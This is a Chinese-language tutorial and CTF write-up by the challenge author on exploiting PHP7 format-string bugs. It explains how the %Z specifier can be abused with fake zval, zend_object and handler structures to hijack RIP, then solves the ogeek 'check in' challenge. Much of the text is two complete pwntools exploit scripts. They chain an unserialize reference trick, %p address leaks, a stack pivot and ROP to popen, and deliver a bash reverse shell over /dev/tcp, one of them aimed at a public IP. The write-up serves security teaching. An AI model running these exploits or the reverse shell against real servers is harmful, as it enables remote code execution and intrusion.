# PHP pwn入门1 - 格式化字符串漏洞
PHP是一门不错的语言,它给予了开发者更多的便捷性。但作为一门解释型语言,而且加入了Zend虚拟机的机制,还有其独特的语法糖,使得其在每一次版本更迭后都有漏洞频频爆出。因为其使用的广泛性,研究PHP的漏洞利用方式是有一定价值的。这里笔者将以自己出的CTF题目为例,记录下自己学习PHP漏洞利用的过程(主要针对PHP7)。
## 了解PHP变量的基本结构
PHP的一个基本结构是zval,它所对应的变量类型由type这个字段标识。
```c
// /Zend/zend_types.h
struct _zval_struct {
zend_value value; /* value */
union {
struct {
ZEND_ENDIAN_LOHI_4(
zend_uchar type, /* active type */
zend_uchar type_flags,
zend_uchar const_flags,
zend_uchar reserved) /* call info for EX(This) */
} v;
uint32_t type_info;
} u1;
union {
uint32_t next; /* hash collision chain */
uint32_t cache_slot; /* literal cache slot */
uint32_t lineno; /* line number (for ast nodes) */
uint32_t num_args; /* arguments number for EX(This) */
uint32_t fe_pos; /* foreach position */
uint32_t fe_iter_idx; /* foreach iterator index */
uint32_t access_flags; /* class constant access flags */
uint32_t property_guard; /* single property guard */
uint32_t extra; /* not further specified */
} u2;
};
```
type的值对应的不同类型可以在`/Zend/zend_types.h`找到
```c
/* regular data types */
#define IS_UNDEF 0
#define IS_NULL 1
#define IS_FALSE 2
#define IS_TRUE 3
#define IS_LONG 4
#define IS_DOUBLE 5
#define IS_STRING 6
#define IS_ARRAY 7
#define IS_OBJECT 8
#define IS_RESOURCE 9
#define IS_REFERENCE 10
/* constant expressions */
#define IS_CONSTANT_AST 11
/* internal types */
#define IS_INDIRECT 13
#define IS_PTR 14
#define _IS_ERROR 15
/* fake types used only for type hinting (Z_TYPE(zv) can not use them) */
#define _IS_BOOL 16
#define IS_CALLABLE 17
#define IS_ITERABLE 18
#define IS_VOID 19
#define _IS_NUMBER 20
```
除了type,另一个我们需要关注的就是value了,它指向了变量对应的实际数据结构体。
![](https://i.imgur.com/KTNHbAM.png)
比如zend_string和PHP漏洞利用经常用到的zend_object
```c
struct _zend_string {
zend_refcounted_h gc;
zend_ulong h; /* hash value */
size_t len;
char val[1];
};
```
```c
struct _zend_object {
zend_refcounted_h gc;
uint32_t handle; // TODO: may be removed ???
zend_class_entry *ce;
const zend_object_handlers *handlers;
HashTable *properties;
zval properties_table[1];
};
```
我们可以发现,一个`zend_object`结构体中包含了`zend_object_handlers`部分
![](https://i.imgur.com/S5mq5E6.png)
这是一个函数列表,在对一个zend_object对象进行处理的时候(可以理解为对PHP的object结构进行一些操作),就会调用其中的函数。
![](https://i.imgur.com/E3nLBfP.png)
PHP的基本结构以及大部分数据基本都存储在PHP堆管理下的堆区域中(mmap),使用emalloc和efree进行分配和释放。它的管理机制笔者暂时不在本篇提及。但是有个比较简单的规律: 分配并释放一块区域,下次再分配同样的大小又会被分配到该区域(其实这也是mmap的规律了)。
## PHP的格式化字符串
PHP的格式化字符串函数增加了一些有PHP特性的格式,比如`%Z`。这个会将对应参数指向的内容(PHP视作`zval`结构体的value)强制转换成`zend_string`输出。
```c
// main/spprintf.c
switch (*fmt) {
case 'Z': {
zvp = (zval*) va_arg(ap, zval*);
free_zcopy = zend_make_printable_zval(zvp, &zcopy);
if (free_zcopy) {
zvp = &zcopy;
}
s_len = Z_STRLEN_P(zvp);
s = Z_STRVAL_P(zvp);
if (adjust_precision && (size_t)precision < s_len) {
s_len = precision;
}
break;
}
```
```c
// Zend/zend.c
ZEND_API int zend_make_printable_zval(zval *expr, zval *expr_copy) /* {{{ */
{
if (Z_TYPE_P(expr) == IS_STRING) {
return 0;
} else {
ZVAL_STR(expr_copy, zval_get_string_func(expr));
return 1;
}
}
```
```c
ZEND_API zend_string* ZEND_FASTCALL _zval_get_string_func(zval *op) /* {{{ */
...
case IS_OBJECT: {
zval tmp;
if (Z_OBJ_HT_P(op)->cast_object) {
if (Z_OBJ_HT_P(op)->cast_object(op, &tmp, IS_STRING) == SUCCESS) {
return Z_STR(tmp);
}
} else if (Z_OBJ_HT_P(op)->get) {
zval *z = Z_OBJ_HT_P(op)->get(op, &tmp);
if (Z_TYPE_P(z) != IS_OBJECT) {
zend_string *str = zval_get_string(z);
zval_ptr_dtor(z);
return str;
}
zval_ptr_dtor(z);
...
```
我们可以看到,如果指向的zval是一个object类型,就会调用其zend_object结构体中的handlers中的cast_object这个函数。
所以当触发格式化字符串漏洞的时候,我们只需要在内存中找到一个可控的地址,在其指向的部分填充一个fake zval(type部分填充`\x08`,value部分填充fake zend_object的地址)、fake zend_object(handlers填充fake handlers)和fake handlers(cast_object填充我们要执行指令的地址),即可控制RIP。但是仅仅控制RIP在很多版本的PHP是不够的,因为RDI不可控,如果是远程攻击而非cli的话,跳到one_gadget就不行了,需要我们去找到一个合适的gadget进行栈迁移达成最终的利用(这里说的是PHP64位的利用)。
这里我以我在vivo 2019 ogeek挑战赛出的题目`check in`为例写一下具体的利用过程。
## ogeek check_in writeup
![](https://i.imgur.com/r8p7Eaj.png)
查看HTML源码发现有文件泄露
![](https://i.imgur.com/P8SXk78.png)
![](https://i.imgur.com/cNlQc1F.png)
发现整个题目的dockerfile和所需附件都给出来了。
逆向test.so和index.php,发现存在漏洞。
![](https://i.imgur.com/fRQ18p1.png)
![](https://i.imgur.com/30IreHO.png)
### 反序列化漏洞
`$this->index()` 从cookie中取出S,依次经过`urldecode`、`base64decode`、`f(rc4加密)`、`base64decode`,传入`php_var_unserialize`
![](https://i.imgur.com/TuqmvFg.png)
经过反序列化的类依次经过对`format`赋值、对`format_str`赋值、对`other`赋值的操作
然后将整个类作为返回值返回,再调用`$obj->render()`渲染
![](https://i.imgur.com/hOhzmNP.png)
format被强制赋值成`<h1> Wel ... %s ...`,format_str是从反序列化结果的`name`中提取的,other就是从反序列化结果的`other`中提取的。
![](https://i.imgur.com/qdKjdgI.png)
在函数render()里,format、format_str、other分别被传入render_s()中。
![](https://i.imgur.com/O9DGqoy.png)
format是作为格式被传入`zend_vspprintf`,剩下两个作为参数。
那么此题的关键在于控制format,在回想刚才format是被写死的,但是它的赋值是在对format_str和other赋值之前进行赋值的,我们可以将format_str通过reference指向format,这样当我们通过name修改format_str时,间接的也修改了format。
```php
$obj->format = &$obj->format_str;
```
从而造成格式化字符串漏洞。
### 格式化字符串漏洞
根据上面所说,我们先使用`%p`泄露libc和libphp的地址,然后控制rip,寻找gadget进行栈迁移。(因为other是第二个参数,且内容可控,所以可以将fake zval、object、handlers布置在上面)
控制RIP时寄存器的状态如下,我们需要跳到一个可以进行栈迁移的位置,将栈迁移至堆上我们可以控制的地方。在寻找gadget之前,我们先记录一下RCX是可控的。
![](https://i.imgur.com/3pa8ldb.png)
具体寻找gadget思路:
1. 对寄存器进行交换。
2. PUSH RCX;POP RSP;
3. ret 0x???;(这种需要将RAX清空,因为返回值不为0的话会跳到zend_error异常退出从而无法触发到第二次ret进行ROP)
![](https://i.imgur.com/Z7WfKTJ.png)
在出题之后,很凑巧在libphp中找到了第二点的gadget
![](https://i.imgur.com/TT8ZSGa.png)
但是比赛当天,我重新使用no-cache build docker的时候发现PHP有更新,这个gadget已经不存在了。
然后我又在libc找到一条可利用gadget, 总算让题目还是可以做。但是libc的地址泄露不是很稳定,需要在所有泄露的地址找以`aa`结尾的地址。
```
ROPgadget --binary /lib/x86_64-linux-gnu/libc-2.27.so --depth 30 |grep "push "|grep "pop rsp"
0x0000000000114334 : push qword ptr [rcx] ; rcr byte ptr [rbx + 0x5d], 0x41 ; pop rsp ; ret
```
### exp
#### 未更新前
```python
from pwn import *
import requests
from urllib import unquote,quote
import base64
import os
from binascii import unhexlify
key = '20190712'
def crypto(string):
sbox = []
for i in range(256):
sbox.append(i)
j = 0
for i in range(256):
j = (sbox[i] + j + ord(key[i%8]))%0x100
sbox[i],sbox[j] = sbox[j],sbox[i]
i1 = 0
i2 = 0
s = ''
for i in range(len(string)):
i1 = (i1 + 1)%0x100
i2 = (i2 + sbox[i1])%0x100
sbox[i1],sbox[i2] = sbox[i2],sbox[i1]
s += chr(ord(string[i]) ^ sbox[(sbox[i1]+sbox[i2])%0x100])
return s
command = "/bin/bash -c '/bin/bash -i >&/dev/tcp/xxxx/xxx 0>&1'\x00\x00"
target = "127.0.0.1"
burp0_url = "http://"+target+"/index.php?a=bbbbbbbbbbb%00cccccccc"
burp0_cookies = {"PHPSESSID": "769cb13v1vbmusfntcpqs3t3bl"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", "Referer": "http://172.16.91.148/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data={"username": "admin", "password": ":admiN123:"}
#a = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
#print base64.b64decode(crypto(base64.b64decode(unquote(a.text.split("cookie='S=")[1].split("';location.hre")[0]))))
'''
a.php
<?php
Class CppClass {
var $name,$format,$format_str,$other;
}
if($argc<=2){
$obj = new \CppClass;
echo serialize($obj);
}
else
{
$format = base64_decode($argv[1]);
$exp = base64_decode($argv[2]);
$obj = new \CppClass;
$obj->name = $format;
$obj->format = &$obj->format_str;
$obj->other = $exp;
echo base64_encode(serialize($obj));
}
?>
'''
def f(fmt,exp):
try:
b = os.popen("php a.php "+base64.b64encode(fmt)+" "+base64.b64encode(exp)).read()
burp0_cookies["S"] = quote(base64.b64encode(crypto(b)))
return requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies).text
except:
return 0
format_str = 'AAAAAAAA%p%p%p%p'
exp = "D"*24+"EEEEEEEE"*37
a = f(format_str,exp).replace("<!-- ./html.zip --!>",'')
heap_addr = a.split('0x')[2]
log.success("heap_addr: 0x"+heap_addr)
heap_addr = int('0x'+heap_addr,16)
lib_php_addr = a.split('0x')[4]
lib_php_addr = int('0x'+lib_php_addr,16)-0x2d0240
log.success("lib_php7.2.so base addr : "+hex(lib_php_addr))
magic_addr = lib_php_addr + 0x2e512b # push rcx; pop rsp; ret;
pop3_ret = lib_php_addr + 0xdbb57
pop_rsi = lib_php_addr + 0xdb427
pop_rdi = lib_php_addr + 0xdbb5c
call_popen = lib_php_addr + 0x1C6A71
'''
Generate fake *zval and *zend_object and *zend_object_handlers
Convert fake *zend_object to *zend_string (%Z)
https://github.com/php/php-src/blob/e6f86fb17cd3a2dfe94ca1a0113a23194cb1915a/main/spprintf.c#L401
https://github.com/php/php-src/blob/21b0f444296ac44eadc7ed3474fba5978ec8163d/Zend/zend.c#L356
https://github.com/php/php-src/blob/7f994990eab4ffc3eb8cddca413dc4bcd03e3457/Zend/zend_operators.c#L878
We can contol PC now.
Stack pivot (magic_addr) => ROP => popen(command,"r");
'''
format_str = "AAAAAAAA%p%Z%p%p"
exp = p64(heap_addr+0x10) # heap_addr
exp += p64(0x8) # heap_addr+0x8
exp += p64(pop3_ret) # heap_addr+0x10
exp += "AAAAAAAA" # heap_addr+0x18
exp += "BBBBBBBB" # heap_addr+0x20
exp += p64(heap_addr+0x30)
exp += p64(pop_rdi)
exp += p64(heap_addr+0xe8)
exp += p64(pop_rsi)
exp += p64(heap_addr+0xe0)
exp += p64(call_popen)
exp += "CCCCCCCC"*16
exp += p64(magic_addr)
exp += "r"+"\x00"*7
exp += command.ljust(80,'\x00')
exp += "AAAAAAAA"
a = f(format_str,exp)
log.success("exploit ok")
```
#### 更新后
```python
from pwn import *
import requests
from urllib import unquote,quote
import base64
import os
from binascii import unhexlify
key = '20190712'
def crypto(string):
sbox = []
for i in range(256):
sbox.append(i)
j = 0
for i in range(256):
j = (sbox[i] + j + ord(key[i%8]))%0x100
sbox[i],sbox[j] = sbox[j],sbox[i]
i1 = 0
i2 = 0
s = ''
for i in range(len(string)):
i1 = (i1 + 1)%0x100
i2 = (i2 + sbox[i1])%0x100
sbox[i1],sbox[i2] = sbox[i2],sbox[i1]
s += chr(ord(string[i]) ^ sbox[(sbox[i1]+sbox[i2])%0x100])
return s
command = "/bin/bash -c '/bin/bash -i >&/dev/tcp/xxx/xxx 0>&1'\x00"
burp0_url = "http://47.112.98.102:14141/index.php?a=bbbbbbbbbbb%00cccccccc"
burp0_cookies = {"PHPSESSID": "769cb13v1vbmusfntcpqs3t3bl"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", "Referer": "http://172.16.91.148/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data={"username": "admin", "password": ":admiN123:"}
#a = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
#print base64.b64decode(crypto(base64.b64decode(unquote(a.text.split("cookie='S=")[1].split("';location.hre")[0]))))
def f(fmt,exp):
try:
b = os.popen("php a.php "+base64.b64encode(fmt)+" "+base64.b64encode(exp)).read()
burp0_cookies["S"] = quote(base64.b64encode(crypto(b)))
return requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
except:
return 0
format_str = 'AAAAAAAA'+"%p"*700
exp = "D"*24+"EEEEEEEE"*37
a = f(format_str,exp).text.replace("<!-- ./html.zip --!>",'')
#print a
heap_addr = a.split('0x')[2]
log.success("heap_addr: 0x"+heap_addr)
heap_addr = int('0x'+heap_addr,16)
lib_php_addr = a.split('0x')[4]
lib_php_addr = int('0x'+lib_php_addr,16)-0x2d0240-0x3c0
log.success("lib_php7.2.so base addr : "+hex(lib_php_addr))
libc_addr = a.split('0x')
libc_addr = libc_addr[-1] # libc addr end with 'aa', you need to adjust the index according to the actual situation.
libc_addr = int("0x"+libc_addr,16)-0x5b9aa
log.success('libc_addr: ' + hex(libc_addr))
magic_addr = libc_addr + 0x114334 #push [rcx];...;pop rsp;
log.success('magic_addr: ' + hex(magic_addr))
pop_ret = lib_php_addr + 0xdb427
pop_rsi = lib_php_addr + 0xdb427
pop_rdi = lib_php_addr + 0xdbb5c
call_popen = libc_addr + 0x80930
format_str = "AAAAAAAA%p%Z%p%p"+"%p"*(700-4)
exp = p64(heap_addr+0x10) # heap_addr (rbx)
exp += p64(0x8) # heap_addr+0x8
exp += p64(heap_addr+0x20)# heap_addr+0x10 (rcx)
exp += "AAAAAAAA" # heap_addr+0x18
exp += p64(pop_ret) # heap_addr+0x20
exp += p64(heap_addr+0x30)
exp += p64(pop_rdi)
exp += p64(heap_addr+0xe8)
exp += p64(pop_rsi)
exp += p64(heap_addr+0xe0)
exp += p64(call_popen)
exp += "CCCCCCCC"*16
exp += p64(magic_addr)
exp += "r"+"\x00"*7
exp += command.ljust(80,'\x00')
exp += "AAAAAAAA"
a = f(format_str,exp)
log.success("exploit ok")
```